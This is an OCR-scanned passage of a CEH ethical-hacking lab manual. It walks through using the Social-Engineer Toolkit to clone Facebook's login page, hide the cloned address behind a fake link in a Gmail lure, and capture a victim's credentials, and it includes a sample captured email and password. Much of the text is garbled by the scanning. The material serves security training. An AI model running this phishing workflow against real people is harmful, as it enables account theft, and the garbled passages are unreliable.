2) F a s t-T ra c k P e & t r a t i o n T e s tin g 3 ‫ י‬T h i r d p.nrty Modules 4) Update the M e ta s p lo it Sranei/ork 5 ) Update th e S o c ia l-E n g in e e r T o o lk it 6 ) Update SET c o n fig u r a tio n 7) H e lp , C r e d it s , and About 99) E x it th e S o c ia l-E n g in e e r T o o lk it

_

FIGU RE 3.3: SET Main menu

5.

A list o f m e n u s 111 S o cia l-E n g in ee rin g A tta ck s w ill ap p ear; ty p e 2 an d p ress Enter to select W ebsite A ttack V ectors.

C E H L ab M anual Page 692

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

« T e rm in a l File Edit View Terminal Help J o in us on i r c .f r e e n o d e .n e t in channel # s e to o lk t The S o c ia l-E n g in e e r T o o lk it i s a p rodu ct o f Tru sted S ec. V is it: h ttp s ://w w w .tru s te d s e c .c o m

1

C Q t i ! e Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple webbased attacks in order to compromise the intended victim.

S e le c t from th e menu: 1) S p e a r-P h is h in q A tta c k Vec to r s | 2) W ebsite A tta c k V e c to rs | 3) I n fe c tio u s Media G en erato r 4 ) C re a te a Payload and L is te n e r _ 5) Hass M a ile r A tta c k ‫ן‬ I 6 ) A rduino-B ased A tta c k v e c to r g |^ % S M S S p oofing A tta c k V e c t o r ♦ 8) W ir e le s s Access P o in t A tta c k V e c to r 9 ) QRCode G en erato r A t t a c | V e c to r 10) P o w ersh e ll A tta c k V e c tlr s 11) T h ir d P a rty Modules 99) R eturn back to th e main menu.

_

^

I A

> r5 s _______________________________
FIGURE 3.4: Social Engineering Attacks menu

6.

111 th e n e x t set o f m e n u s th a t ap p ears, type 3 a n d p ress Enter to select th e Credential Harvester Attack Method
File Edit View Terminal Help and th e B a ck|T rack team . T h is method u t i l i z e s !fra m e replacem ents to make th e h ig h lig h te d URL l i n k to appear l e g it i m a te however *tf en c lic k e d a window pops up then i s re p la c e d w ith th e m a lic io u s l i n k . You can e d i t th e l i n k replacem ent s e ttin g s in th e set^ c o n F ig i f i t s to n fc *k o « /fa s t.

1

0 3 T11e Credential Harvester M ethod will utilize web cloning o f a website that has a username and password field and harvest all die information posted to die website.

The M u lt i-A t t a c k method w i l l add a co m binatio n o f a tta c k s through th e web a tta c k Jr menu. For example you can u t i l i z e th e Java A p p le t, M e ta s p lo it Browser, C r e d e n t ia l H a rv e s te r/T a b n a b b in g , and th e Man L e f t in th e M id d le a tta c k a l l a t once to see which i s s u c c e s s fu l. m. 1) Java A p p le t A tta c k Method 2) M e ta s p lo it Browser E x p lo it Method

I3) Credential Harvester Attack Method | 4) Tabnabbing Attack Method

5 ) Man l e f t i n th e M id d le A tta c k Method 6) Web Jacking A tta c k Method 7 ) M u l t i - A t tack Web HethoJ 8) V ic tim Web P r o f i l e r 9 ) C re a te o r im p o rt a CodeSigning C e r t i f i c a t e
99)

ack

Return to Main Menu

s e t :w eb attackj3B 1

FIGURE 3.5: website Attack Vectors menu

U

7.

N o w , type 2 an d p ress Enter to select th e S ite Cloner o p tio n fro m th e m enu.

C E H L ab M anual Page 693

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

« T e rm in a l File Edit View Terminal Help 9 ) C re a te o r im p o rt a CodeSigning 99) R eturn to Main Menu M

CQt1 1e Site Cloner is used to d o n e a website o f your choice.

s e t : w e b a tta c k >3 The f i r s t method w i l l a llo w SET to im p o rt‫ *!' ׳‬l i s t o f p r e -d e fin e d web a p p lic a t io n s t h a t i t can u t i l i z e w it h in th e a t ta c k . The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e c o m p le te ly same web a p p lic a t io n you were a tte m p tin g to c lo n e . I h e t h i r d method aU ow s y o u jto im p o rt your own w e b s ip ;, n ote t ^ a t you Should o n ly have alt' in d e x .h tm l when using th e im p o rt W ebsite

f u n c t io n a lit y ^ ^ *

Y jF
v I I


^ 3 4

^

I V

•)

/

‫׳‬

‫י‬

1) Web T em plates 12) S i t e C lo n e r ! 3) Custom Im p o rt

\ - ■ «‫״‬

99) R eturn to W ebattack Menu ;e t:w e b a tta c k a E f|_______________

FIGU RE 3.6: Credential Harvester Attack menu

T y p e th e IP ad d ress o f y o u r B a ck T rac k v iru ia l P C 111 th e p r o m p t to r IP add ress for th e POST back in Harvester/Tabnabbing a n d p ress Enter. 111 tins exam ple, th e IP is 10.0.0.15
* T e rm in a l File Edit View Terminal Help

COS t 1 1e tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks die link, die victim will be presented with a “Please wait while the page loads”. W hen the victim switches tabs because h e/she is multi-tasking, the website detects that a different tab is present and rewrites die webpage to a website you specify. The victim clicks back on the tab after a period o f time and diinks diey were signed out o f their email program or their business application and types the credentials in. W hen the credentials are inserts, diey are harvested and the user is redirected back to the original website.

a p p lic a t io n s t h a t i t

can u t i l i z e w it h in th e a t t a c k .

The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e co m p le te ly same web a p p lic a t io n you were a tte m p tin g to c lo n e . The t h i r d method a llo w s you to im p o rt you r own w e b s ite , n ote t h a t you should o n ly have an in d e x .h tm l when using th e im p o rt w e b s ite f u n c t io n a l it y . 1) Web Tem plates 2 ) S i t e C lo n e r 3) Custom Im p o rt 1 9 9 ) R eturn to W eb A ta c k Menu I / . * |

_ ^

'

J[jLS‫־‬ ir br
set

t -1 C r e d e n tia l h a r v e s te r w i l t a llo w you to u t i l i z e th e clone c a p a b i l i t i e s w it h in

r3

‫ן‬

J

[-1 t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p ie c e them in * to a re p o rt [-1 T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o . [ -J I f y o u 'r e using an e x t e r n a l I P , use your e x t e r n a l IP f o r t h is

:

> IP address for the POST back in Harvester/Tabnabbina: 110.0.0.15| FIGU RE 3.7: Providing IP address in H arvester/Tabnabbing

N o w , y o u w ill be p ro m p te d fo r a U R L to b e clo n ed , type th e d esired U R L fo r Enter th e url to clo n e a n d p ress Enter. 111 tin s ex am p le, w e h av e u se d w w w .fa ceb o o k .co m . T in s w ill n n tia te th e clo n in g o f th e sp ecified w eb site.

C E H L ab M anual Page

694

E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

*

T e rm in a l

File Edit View Terminal Help and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h i n th e c o m p le te ly same web a p p lic a t io n you w ere a tte m p tin g t o c l o n e T ^ ^ ^ ^ ^ ^ ^ The t h i r d method a llo w s you to im p o r t-y m jr own w e b s ite , n o te t h a t you should o n ly have an in d e x .h tm l when usin g th e im p o rt w e b s ite f u n c t io n a l it y . 1) Web Tem plates

CQ t1 1e web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

2) S i t e C lo n e r
3) Custom Im p o rt 99) R eturn to W ebattack Menu :w eb a tta c k >2 — C r e d e n tia l h a r v e s te r w i l l a llo w you to u t i l i z e

[•]

t h e c lo n e c a p a b il i t i e s w it h i r

as w e ll as p la c e them ir c r e d e n tia ls to a r e p o r t I ^ ■ % I % ■ I V J 1 ha a t IP th e s e rv e r w i l l POST t o . V [-] T h is o p tio n i s used f o 3r r A |h ^ [■ ] I f y o u 'r e using an e x t e r n a l IP , use your e x t e r n a l IP f o r t h i s s e t :w eb a tta c k > IP address f o r th e POST back in H a rv e s te r/T a b n a b b in g : 1 0 . 0 . 0 . 1 5 [ • ] SET sup ports both HTTP and HTTPS [ - ] Example: h t t p : //w w w . t h is is a f a k e s i t e . com____________ ; e t :w eb atta ck> E n te r th e u r l to c lo n e :Rvww. fa c e b o o k . com!

J r> [ ‫ ] ־‬to h a rv e s t

1 TJ T o r param eters f rom a w e b s ite

M

FIGU RE 3.8: Providing URL to be cloned

10. A fte r clo n in g is c o m p le te d , th e h ig h lig h ted m essage, as sh o w n 111 th e follow ing sc re e n sh o t, w ill a p p e a r o n th e Terminal screen o t SET. P ress Enter to co ntinue. 11. I t w ill sta rt C red e n tia l H arv ester. 1333If you ’re doing a penetration test, register a name that’s similar to the victim, for Gmail you could do gmail.com (notice the 1), something similar diat can mistake the user into thinking it’s die legitimate
File Edit View Terminal Help 99) R eturn to W ebattack Menu s e t :w e b a tta c k >2 [-1 C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e

51
th e c lo n e c a p a b il i t i e s w it h in

SET
[ - ] to h a rv e s t c r e d e n tia ls o r param eters from a w e b s ite as w e ll as p la c e them in to a r e p o rt [ - ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o . t -J I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is s e t :w e b a tta c k > IP address f o r th e POST back i n H a rv e s te r /T a b n a b b in g :1 0 .0 .0 .1 5 { - ] SET sup ports both HTTP and HTTPS I - ] Example: h t tp ://w w w .th is is a f a k e s it e .c o m I s e t : w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com

b
[*] [*j

‫—ך‬

.

C lo n in g th e w e b s ite : h t t p s ://lo g in .fa c e b o o k .c o m /lo g in .p h p T h is cou ld ta k e a l i t t l e b i t . . . 1 I J

Trie b e » « v Ttoaie fteu ■tfm .k i J 11
f i e l d s a re a v a il a b l e . R e g a rd le s s , K h i [ ! ] I have read th e above message. Press < r e tu r i to c o n tin u e

fo k c

‫י‬

,

POSTs on a w e b s ite .

FIGU RE 3.9: SET Website Cloning

12. L eave th e C red e n tia l H a rv e ste r A tta c k to fetc h in fo rm a tio n fro m th e v ic tim ’s m achine.

C E H L ab M anual Page 695

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

*

T e rm in a l

File Edit View Terminal Help

m W hen you hover over the link, die URL will be presented with the real URL, not the attacker’s machine. So for example if you’re cloning gmail.com, the URL w hen hovered over it would be gmail.com. W hen die user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver. Remember you can change the timing of the webjacking attack in die config/set_config flags.

[ - ] C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e th e c lo n e c a p a b i l i t i e s w it h in SET [ - ] t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p la c e them in to a r e p o rt —— [■ ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o . _ * a * * ' [ - ] I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is s e t :w e b a tta c k > IP address f o r th e POST back i n H a r v e s t e r / T a b n a b b i n g : l # ^ ^ ^ ^ ^ [ - ] SET sup ports both HTTP and HTTPS [-1 Example: h t t p : //w w w .th is is a f a k e s it e .c o m s e t :w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com

[* j T h is

[*]

C lo n in g th e w e b s ite : h t t p s ://lo g in .fa c e b o o k .c o m /lo g in .p h p could ta k e a l i t t l e b i t . . . sername and pas sw o rd torm f tp t u r e s a l POSTs A a webs

The bea t way to use t h i s a t t a c k i » i f f i e l d s f t r g ava i l a b l e . R e j r d l e s s . ■ h i I ' l l have read th e above message. Press to co n tin u e

‫ ] ׳‬S o c ia l-E n g in e e r T o o lk i t C r e d e n t ia l H a rv e s te r A tta c k , j C r e d e n t ia l H a rv e s te r i s running on p o r t 80 ■] In fo rm a tio n w i l l be d is p la y e d to you as i t a r r iv e s below:

FIGU R E 3.10: SET Credential Harvester Attack

13. N o w , y o u h a v e to se n d th e IP address o f y o u r B a ck T rack m a ch in e to a victim an d trick h im o r h e r to click to brow se th e IP ad d ress. 14. F o r tins d em o , la u n c h y o u r w e b b ro w se r 111 th e B a ck T rack m a ch in e ; la u n c h y o u r fav o rite em ail service. 111 th is ex am p le w e h av e u se d w w w .gm ail.com . L o g in to y o u r gm ail a c c o u n t a n d c o m p o se an email.

0 =5!Most o f die time they w on’t even notice the IP but it’s just another way to ensure it goes on w ithout a hitch. N ow that the victim enters the username and password in die fields, you will notice that we can intercept the credentials now.

FIGURE 3.11: Composing email in Gmail

15. Place th e c u rso r 111 th e b o d y o f t 1e em ail w h e re y o u w ish to p lace th e lake U R L . T h e n , click th e Link
CO

icon.

C E H L ab M anual Page 696

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

‫ א‬C o m p o s e M ail —« ‫־‬ 9 ) • >flma 1 l.c o m * C m a il • M o z illa F ire to x Ejle Edit yiew History flook marks Ipols Help

S' ‫ן‬

^

f i http‫״‬

google.com/n^il,

T C | 121▼ Google

Q,

|Ba:kTrack Lnux l i *

nsiwe Security |lE x p lo it‫־‬DB ^A ircrack-n g J^SomaFM

Gmail

Documents

Calendar

More • 0 + Share

G 0 v ‫׳‬g l e
Discard Lab«h‫־‬ » Draft autosaveti at 10:4a AM (0 minutes ago)

o
I

° Inbox SUrrwJ Important Sert Mail Drafts (2) ► Circles

-

j@yahoo.com,

Add Cc Add Bcc Su bject @TOI F - Party Pictures Attach a no

‫ ־‬b Hoilo Sam.

I

y

T ‫ ־‬rT * A ‫| © • ־ד ־‬o o |i= }= •5

i s ‫יי‬

*

*

^

I * « Plain Toxt

chock spoiling■‫״‬

PI»4m » click this link lo view tt>*♦ w»#»kt»1 1 d (vtrty pictures at TGIF wflh thw cmMxMim*

Regards.

m.
Search chat or SU' 9‫«י‬

FIGURE 3.12: Linking Fake URL to Actual URL

16. 111 th e Edit Link w in d o w , first type th e actu al ad d ress in th e Web add ress field u n d e r th e Link to o p tio n a n d th e n type th e fake U R L 111 th e T ext to display held. 111 tins ex am p le, th e w eb ad d re ss w e h av e u se d is http://10 .0.0.15 a n d tex t to d isplay is w w w .facebook.com /R ini TGIF. C lick OK
‫׳־י‬ ‫ א‬C o m p o s e M ail ‫■» ־‬ < «■ ■■ ■■• . ‫) ן‬g )g m ail.co m - C m a il • M o z illa F ire to x

tile

Edit

yiew History flookmarks !pols Help

IM C Compose Mail *

3 !5 ‫■ ״‬
»Rlni Search

ra p ‫• ־‬

googie.com

▼©

I f l r Google

Q.

(BackTrack Lnux ensi we Security ||F x p lo it‫־‬DB ^A ircrack-n g j ^ r>omaFM Images Maps Play YouTube

G o .)g Ie
Draft eutosaved at 10:45 AM (0 minutes ago)

Inbox Starred Important Sent Ma! Drafts (2) Circles JunkE-mal

X E d it Link Toxt to aiepiay: L w (vfacehook coaVRinl TGIf J Q U r* to. 0 Web address C Email * * ♦‫י י•־‬ To what URL should this link go? |wtp0.0.15 10‫־‬/‫ | ׳‬Q T *‫>״‬l this in* Not sure w rhat lo pul In the boxT r m fhd t* * ■im gean the t*ob far you wanr lo Ink to (A acarcAcnainc nvotit be useful.) Then coo rtc acb addNsa from me box h your browser's acMroso Qor and potto it 140 tno box aoov•

|

OK

|

Cared

FIGU RE 3.13: Edit Link window

17. T h e fake U R L sh o u ld a p p e a r 111 th e em ail b o d y , as sh o w n 111 th e follow ing screen sh o t.

C E H L ab M anual Page 697

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

Ejle Edit

‫ א‬Com pose Mail ‫—» ־‬ ............. • (g>gma1l.com * Cmail • Mozilla Firefox History flook marks Ipols Help

|Ba:kTrack Linux |*|Offensive Security |[JjExploit-DB ^A ircrack-n g jgjjSomaFM

G 0 v ‫׳‬g l e
Saved Discard Labels •» ‫־‬ Draft autnsaved at 11:01 AM (0 minutes ago) 0 ‫־‬

c a The Credential Harvester M ethod will utilize web cloning o f a website that has a username and password field and harvest all die information posted to the website.

To Inbox

@yahoo com, Add Cc Add Bcc

B

S U r r e d
Important Sert Mail Drafts (2) ► Circles Subjed

(QTGIF - Party Pictures Attach a 1 0 ‫ת‬

Sf ‫ ־‬B hello Sam.

I

U

T - »T - A, • T - ©

oo | -

IE 3

is

H

«

=3 ^

, piain roxt

chock spoiling■'

P1-*m» click this Ilfikj ivivw U:»|>r1 1 * t:<m1 .Rlnl TfilFjlo vlt‫״‬w Ih* Koqaroe.

< 1 parly picturws at TGIF wilh lh» celatarttlM

S e a rc h1 9*

FIGURE 3.14: Adding Fake URL in the email content

18. T o v erity th a t th e fake U R L is linked to th e actual U R L , click th e fake U R L a n d it w ill display th e actual U R L as Go to link: w ith th e actual U R L . S end th e em ail to th e in te n d e d user.
•‫־‬ x C om pose M a il • • -• ipg m m l.co m - G m ail • M o z illa F ire fo x

File Edit yie* History gookmarks !0015 Help
M Compose Mail -

V

5 r'

oogle.com OffensiveSecurity |lE xplo it-D B ages Maps Play YouTube KA ircrack-ng |£SomdFM

r g | |>|t r.ocinle Q , (g

Q B d ikT ta ckU n u *

G o u g le
Discard Labels » Draft autosaved at 11:01 AM (0 minutes ago)

+ Share

[ ‫]־‬

0•

@yahoo.c

In some cases when you’re performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes die attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to O N . If you want to use self-signed certificates you can as well however there will be an “u n tru sted ” warning when a victim goes to your website

m

Inbox Starred Important Sert Ms Drafts (2) Circles JunkE-mal

Add Cc Add Bcc Sucjecl @TGI F - Party Pictures Attach a no ‫מ‬ ■ B I U T • tT * A ‫ ־‬T • © M jE IE •= 1 ‫ ׳‬M E = 1 / x « Plain Text Check Spelling-

Please click this link ww\v.facebQ0 k.CQm<Rini TGIF to view the weekend party pictures at TGIF with the celebrities rcpgjrcfc | Go to link. Mlp:f/10.0.0. 1y - Chanoe Remove y |

FIGURE 3.15: Actual URL linked to Fake URL

19. W h e n th e v ic tim clicks th e U R L , h e o r she will be p re se n te d w ith a replica o f Facebook.com 20. T h e v ictim w ill b e en ticed to en te r 111s o r h e r u ser n a m e an d p assw o rd in to th e fo rm fields as it ap p ears to be a g en u in e w ebsite. W h e n th e v ic tim en ters the U sernam e an d Passw ord an d clicks Log In, it do es n o t allow logging in; in stead , it red irects to th e legitim ate F a c e b o o k login page. O b serv e th e U R L in th e brow ser.

C E H L ab M anual P ag e 698

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

m H ie multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So w hen the user clicks the link he will be targeted by each o f the attack vectors you specify. O ne tiling to note with the attack vector is you can’t utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack.

f a c e b o o k
Sign Up Connect and share w ith th e people in you r Ife.

T a rp b o o k 1o g in

(mart or t*hon*: Password: --------| 1Keep me lowed in or Siga up for tacetoook Forgot your osss*vord?

fcngist‫!) ־‬kwo fflOj®Oge =33and Rrtugjes (= t

F3Lcb5x S 2012

Moble ‫ ־‬Find Friends ‫ ־‬Eodces People ‫ ־‬Poqcs Afccut Crca* cr Ad Create a Page ‫־‬Developers Careers ‫ ־‬Privacy Coatses Terre

Q lo g 1n|h>c«book

\

m \
| Saver password Never for this site

1 |

<‫ ־‬H C
^

S|hnp3:;;www.face&oolccom/10gin.php|

1

Do you want Google Chrome to save your password?

• <

f a c e b o o k
Skjn Up CuarMH.1 a n d slur** w ltli Ilu* ptMipk* 1 1 1 y o u r lit*.

F acebook Login

The multi attack vector utilises each combination o f attacks and allows the user to choose the method for the attack. O nce you select one o f the attacks, it will be added to your attack profile to be used to stage the attack vector. W hen you’re finished be sure to select the I ’m finished' option.

m

Emai or Phone; | Password: □ Keep me logged m c» Sum up for r«c^book forgot rout D»s*crcP

Cnglab (U S ] VMI

4n-JI

Ov/u &Aj<BD£« [ x a 'd Pwtuoje* Ow O r ‫־‬arKab (France)

Faeaboofc Z 2012

M odI* ‫ ׳‬hind S-n*ndc ‫ ׳‬Batigcc - ■«pl« - Hg*c - /•tout j * 1 ‫׳‬ar Ad Craaca a P«g* -L'«/*cp«rc - Lar**rc -!*rvacy 4 ‫ ׳‬Cask** • l«r‫־‬ r*

m

FIGU RE 3.16: Fake and Legitimate Facebook login page

21. A s so o n th e v ic tim types 111 th e em ail ad d re ss a n d p as sw o rd , th e SET Terminal 111 B a ck T rack fetc h es th e ty p ed u se r n a m e a n d p assw o rd , w h ic h ca n be u se d by an attac k er to g am u n a u th o riz e d access to th e v ic tim ’s a c co u n t.

C E H L ab M anual Page 699

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

*

‫׳י‬

* Terminal

File Edit View Terminal Help
[ * ] S o c ia l-E n g in e e r T o o lk it C r e d e n t ia l H a rv ester‫ ־‬A ttack. [ * j C r e d e n t ia l H a rv e s te r i s running on p o r t 80 [ * j In fo rm a tio n w i l l be d is p la y e d to you as i * ‫ י‬- - ‫ ״ ץ י ~ י‬h r l " “ ‫־‬ 1 0 . 0 . 6 .2 - - [2 6 /S e p /2 0 1 2 1 1 :1 0 :4 1 ] “GET / H T T P /1 .1 “ 200 [ * ] WE GOT A H IT ! P r in t in g th e o u tp u t: PARAH: lsd=AVqgmkGh PARAH: r e tu r n session=0 PARAH: le g a c y r e t u r n = l PARAM: d is p la y ‫־‬ PARAH: session key only=0 PARAH: trynu!n=l PARAH c h a rs e t t e s t = € , ‫ ׳‬fl,€ PARAH tim ezo n e= -330 PARAH lgnrnd=224034 ArY/U PARAH 0OSSI p o s s ib K § = tc s fe l2 | r f I PARAH: d e f a u l t p e rs is te n t= ‫־‬Q POSSIBLE USERNAHE FIELD FOUND: lo « .n = L o g + In [» ) WHEN YOU'RE FINISHED, H IT CONTROL-C TO GENERATE A REPORT.

m Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want widiin that list.

FIGURE 3.17: SET found Username and Password

22. P ress CTRL+C to g en e rate a r e p o rt to r tins atta c k p erfo rm ed .
/ v v x Terminal

File Edit View Terminal Help
PARAH: lsd=AVqgmkGh PARAH: r e tu r n session=0 PARAM: le g a c y r e t u r n = l PARAM: d is p la y ‫־‬ PARAM: ses sion key only=0 PARAH: tr y n u »=l PARAH: c h a rs e t t e s t = € , / K ,fl,€ PARAH: tiraezo n e=-540 PARAH: Ig n rnd=224034 ArYA PARAH: lg n js = n POSSIBLE USERNAHE FIELD FOUND: e ma i l ‫•' ׳ — ־‬ POSSIBLE PASSWORD FIELD FOUND: p as s= test PARAH: d e f a u lt p e r s is te n t= 0 POSSIBLE USERNAHE FIELD FOUND: l g in = L g+In [ * ] WHEN YOU'RE F IN IS H E D -H IT C0N1R0L-C C TO GENERATE A REPOftf.

1

m The multi-attack will add a combination o f attacks through the web attack menu. For example you can utilize die Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

0

0

'C [ * ]

L . exp o rte d t o HaIE R s n ** M r w l W
ftle Press < r e t u r

I x
r J w k* tS s //2 20 0K f t -- 0 09 9- 2f6 t 1 1 5 ::4 9 :1 5 .S 4 f t l 5 . l f » L f o r your

I V

W

l

W A

V

f I X

-‫ך‬

[ • ] F i l e in XHL fo rm a t exp o rted t ( | r e p o r ts /2 0 1 2 -0 9 -2 6 1 5 :4 9 :1 5 .5 4 6 4 l ^ .x j r read in g p l e a s u r e . . .

1

to c o n tin u e

FIGU RE 3.18: Generating Reports duough SET

Lab Analysis
A nalyze an d d o c u m e n t d ie results related to d ie lab exercise.

C E H L ab M anual Page 700

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

T o o l/U tility

I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d PA R A M : lsd= A V qgm kG 11 P A R A M : re tu rn _ s e s s io n = 0 PA R A M : le g ac y _ re tu rn = 1 P A R A M : d is p la y s PA R A M : se ssio n _ k e y _ o n ly = 0

S o c ia l E n g in e e rin g T o o lk it

PA R A M : try n u m = 1 PA R A M : ch a rse t_ te st= € ,',€ ,', PA R A M : tim e z o n e = -5 4 0 PA R A M : lg n rn d = 2 2 4 0 3 4 _ A rY A PA R A M : lg n js = n e m a il= sa m c h o a n g @ y a h o o .c o m p a s s = te s t@ 1 2 3

PLEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S RE L A T E D TO T H I S LAB.

Questions
1. E valuate each o f th e follow ing P aros p ro x y options: a. b. c. d. T ra p R equest T ra p R esponse C ontinue b u tto n D ro p b u tto n

I n t e r n e t C o n n e c t io n R e q u ir e d 0 Y es P la tf o r m S u p p o r te d 0 C la s s r o o m □ !Labs □ No

C E H L ab M an u al Page 701

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]